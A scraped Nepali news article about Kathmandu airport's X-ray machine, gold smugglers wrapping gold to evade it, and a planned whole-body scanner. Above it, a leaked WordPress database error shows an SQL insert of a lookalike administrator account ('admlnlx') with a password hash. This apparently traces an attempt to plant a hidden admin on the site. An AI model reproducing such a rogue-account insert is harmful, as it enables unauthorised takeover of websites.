WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BTRrbewg38oCtM4ecnWeE.ssyAUC29.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 04:20:54', '', 'admlnlx', 'admlnlx')
काठमाडौं,पुस २७-
त्रिभुवन विमानस्थलमा हाल चालु रहेको एक्स रे मेसिनले ‘होल बडी’ एक्सरे नहुने भएकाले चोर र तस्करहरुलाई सजिलो भइरहेको सरकारी अधिकारीहरुले निश्कर्ष निकालेका छन् । यसको समाधानका लागि अब ११ करोडको अत्याभुनिक मेसिन जडान हुने भएको छ ।
अहिले चालु रहेको मेसिनबाट कालो प्लास्टिकमा बेरिएको सामान समेत पत्ता लगाउन समस्या हुने भएकाले पछिल्लो समय तस्करीमा यो प्रविधि प्रयोग गर्न थालिएको जानकारी दिइएको थियो ।
यसैसाता सुन तस्करहरुले पनि एक्स रे मेसिनलाई झुक्याउनका लागि सुनलाई कालो टेप र कार्बनमा बेरेर विमानस्थलमा ल्याएका थिए । भन्सार विभाग प्रमुख शिशिर ढुंगानाले अन्तरराष्ट्रिय विमानस्थलमा अब ११ करोड ९५ लाख रुपैयाँ बराबरको नयाँ एक्स रे मेशिन जडान गर्ने तयारी भइरहेको बताएका छन् ।यो मेसिनले मानिसको ‘होल बडी’ चेक गर्न सकिने आन्तरिक रुपमा लुकाइएका चिजसमेत एक्सरे गर्ने जानकारी ढुंगानाले दिए ।
अहिले एक्सरे सञ्चालन गर्न सक्ने दक्ष जनशक्ति कम रहेकाले पनि कर्मचारीलाई लामो अवधिसम्म सरुवा नगरी त्यही जिम्मेवारी दिनुपरिरहेको समेत ढुंगानाले उल्लेख गरे ।